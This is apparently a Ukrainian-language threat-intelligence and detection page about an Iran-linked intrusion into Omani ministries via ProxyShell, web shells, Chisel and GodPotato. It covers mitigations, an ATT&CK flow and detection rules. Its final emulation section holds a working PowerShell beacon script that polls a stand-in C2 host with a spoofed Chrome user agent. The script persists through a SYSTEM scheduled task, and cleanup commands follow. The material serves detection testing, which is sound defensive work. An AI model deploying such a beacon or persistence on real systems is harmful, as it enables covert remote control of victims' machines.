Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Загроза, підконтрольна державі, здійснена з Ірану, скомпрометувала кілька державних міністерств в Омані, використовуючи вебшелли, експлойти ProxyShell та спеціалізоване середовище командування і управління, розміщене на VPS в ОАЕ. Зловмисники ексфільтрували понад 26 000 записів користувачів і системних вуликів реєстру, а потім розгорнули інструменти після компрометації, такі як Chisel і GodPotato, щоб поглибити доступ. Операція була додатково викрита відкритим каталогом, який випадково розкрив інструменти, скрипти та журнали командно-керуючих серверів зловмисників, що надало можливість відстежити весь цикл вторгнення.
Розслідування
Дослідники отримали доступ до відкритого VPS на 172.86.76.127 і виявили вебшелли, скрипти командування та управління на основі Python, інструменти підвищення привілеїв та кілька скриптів-експлойтів, які націлені на ProxyShell і вразливість DNN SSRF. Журнали мережі показали активність маякових сигналів через порти 8001 and 8002, разом з використанням тунелів Chisel для прихованого доступу. Розслідування також задокументувало створення запланованих завдань, екстракцію вуликів реєстру та масове вивантаження даних з скомпрометованих систем.
Пом’якшення
Організації повинні застосувати всі патчі, пов’язані з ProxyShell в Microsoft Exchange, і виправити вразливість DNN SSRF, що відслідковується як CVE-2025-32372. Веб-застосунки мають бути укріплені, облікові записи IIS повинні працювати з мінімальними правами, а невикористані ASP.NET сторінки повинні бути вимкнені де це можливо. Захисники також повинні розгортати веб-фаєрволи, контролювати вихідний трафік через незвичні порти та періодично перевіряти сервери, що виходять в Інтернет, на наявність забутих або відкритих каталогів.
Відповідь
Команди безпеки повинні створювати виявлення для шаблонів доступу до вебшеллів, поведінки маяків PowerShell, активності тунелів Chisel та підозрілого створення запланованих завдань. Відповідники на інциденти повинні зібрати журнали вебсерверів, вулики реєстру та будь-які дампи бази даних для криміналістичного аналізу. Скомпрометовані системи повинні бути ізольовані, облікові дані змінені, а відповідні органи влади Оману або зацікавлені сторони негайно повідомлені.
"graph TB %% Class Definitions Section classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Node Definitions u2013 Techniques initial_access["<b>Техніка</b> – <b>T1190 Використання Застосунків, Що Відкриті Для Громадськості</b><br/>Метод: ProxyShell & DNN SSRF"] class initial_access technique remote_services["<b>Техніка</b> – <b>T1210 Експлуатація Віддалених Сервісів</b><br/>Латеральний рух"] class remote_services technique web_shell["<b>Техніка</b> – <b>T1505.003 Вебшелл</b><br/>Розгорнуто: hc2.aspx / health_check_t.aspx"] class web_shell technique c2_bidir["<b>Техніка</b> – <b>T1102.002 Двонаправлене Спілкування Через Вебсервіси</b><br/>HTTP сервер C2"] class c2_bidir technique tunneling["<b>Техніка</b> – <b>T1572 Протокольний Тунель</b> & <b>T1219.001 IDE Тунелювання</b><br/>Інструмент: Chisel"] class tunneling technique weaken_enc["<b>Техніка</b> – <b>T1600 Ослаблення Шифрування</b><br/>Застосовується до тунелю"] class weaken_enc technique priv_esc["<b>Техніка</b> – <b>T1134.003 Маніпуляція Токенами Доступу</b> & <b>T1068 Експлуатація Для Підвищення Привілеїв</b><br/>Інструмент: GodPotato"] class priv_esc technique account_manip["<b>Техніка</b> – <b>T1098 Маніпуляція Обліковими Записами</b><br/>Збереження підвищених прав"] class account_manip technique cred_access["<b>Техніка</b> – <b>T1012 Запит Реєстру</b><br/>Крадіжка вуликів SAM/Системи"] class cred_access technique def_evasion["<b>Техніка</b> – <b>T1562 Ослаблення Захисту</b> & <b>T1668 Ексклюзивний Контроль</b><br/>Вимкнення AV"] class def_evasion technique discovery["<b>Техніка</b> – <b>T1592.002 Збір Інформації Про Хост Жертви</b> & <b>T1590.001 Властивості Домену Мережі</b>"] class discovery technique exfiltration["<b>Техніка</b> – <b>T1041 Ексфільтрація Через Канал C2</b> & <b>T1030 Обмеження Розміру Даних Під Час Передачі</b>"] class exfiltration technique oneway["<b>Техніка</b> – <b>T1102.003 Однонаправлене Спілкування Через Вебсервіси</b><br/>Розміщення результатів"] class oneway technique %% Node Definitions u2013 Tools / Malware tool_proxyshell["<b>Інструмент</b> – <b>Назва</b>: ProxyShell<br/><b>Призначення</b>: Експлуатація Exchange Server"] class tool_proxyshell tool tool_chisel["<b>Інструмент</b> – <b>Назва</b>: Chisel<br/><b>Призначення</b>: Тунелювання"] class tool_chisel tool tool_godpotato["<b>Інструмент</b> – <b>Назва</b>: GodPotato<br/><b>Призначення</b>: Підвищення Привілеїв"] class tool_godpotato tool %% Connections u2013 Attack Flow initial_access –>|призводить| до remote_services initial_access –>|використовує| tool_proxyshell remote_services –>|призводить| до web_shell web_shell –>|дозволяє| c2_bidir c2_bidir –>|використовує| tunneling tunneling –>|використовує| tool_chisel tunneling –>|дозволяє| weaken_enc weaken_enc –>|дозволяє| priv_esc priv_esc –>|використовує| tool_godpotato priv_esc –>|дозволяє| account_manip account_manip –>|дозволяє| cred_access cred_access –>|дозволяє| def_evasion def_evasion –>|дозволяє| discovery discovery –>|дозволяє| exfiltration exfiltration –>|використовує| oneway "
Потік атак
Виявлення
Можливість виконання через приховані командні рядки PowerShell (через cmdline)
Перегляд
Завантаження або вивантаження через Powershell (через cmdline)
Перегляд
Можливе перерахування або маніпуляція з обліковими записами чи групами (через cmdline)
Перегляд
LOLBAS Schtasks (через cmdline)
Перегляд
IOCs (HashSha256) для виявлення: Операція Іранського Nexus проти Уряду Оману: Вдарено 12 міністерств та розкрито 26 000 записів громадян
Перегляд
IOCs (SourceIP) для виявлення: Операція Іранського Nexus проти Уряду Оману: Вдарено 12 міністерств та розкрито 26 000 записів громадян
Перегляд
IOCs (DestinationIP) для виявлення: Операція Іранського Nexus проти Уряду Оману: Вдарено 12 міністерств та розкрито 26 000 записів громадян
Перегляд
Виявлення вебшолів hc2.aspx та health_check_t.aspx та експлуатація ProxyShell [Webserver]
Перегляд
Виявлення команд PowerShell та ексфільтрація через підроблений користувацький агент Chrome [Windows Powershell]
Перегляд
Імітаційне виконання
Передумова: Перевірка телеметрії та базової лінії перед польотом має бути пройдена.
Обґрунтування: У цьому розділі детально описується точне виконання техніки супротивника (TTP), розроблене для запуску правила виявлення. Команди та наратив повинні прямо відображати ідентифіковані TTP та мати на меті генерувати саме ту телеметрію, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Сценарій атаки та команди:
Атакувач уже отримав доступ до машини жертви і бажає встановити обладнання C2, яке спрацьовує мало шумно. Він скидає скрипт PowerShell new_beacon.ps1 в папку AppData користувача. Цей скрипт працює в безкінечному циклі, опитуючи віддалений C2 кожні 30 секунд. Кожен HTTP-запит створюється з рядком UA Chrome, щоб злитись з нормальним веб-трафіком, уникаючи тим самим виявлення на основі мережі (T1217, T1674). Атакувач запускає це обладнання через заплановане завдання для забезпечення збереження персистентності (T1204.004). -
Скрипт тесту регресії:
# ------------------------------------------------- # Розгортання та запуск нової сигналізації PowerShell # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" $c2Url = "http://malicious.example.com/beacon" # 1. Запис сигналізаційного скрипту (імітована легка версія) $scriptContent = @' while ($true) { $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36" } try { Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null } catch {} Start-Sleep -Seconds 30 } '@ Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8 # 2. Регістрація запланованого завдання для збереження персистентністі (виконується кожну хвилину) $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`"" $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue) $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force Write-Host "Beacon deployed and scheduled task created." -
Команди очищення:
# ------------------------------------------------- # Видалення сигналізації та запланованого завдання # ------------------------------------------------- $beaconPath = "$env:APPDATAnew_beacon.ps1" Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue Write-Host "Cleanup completed."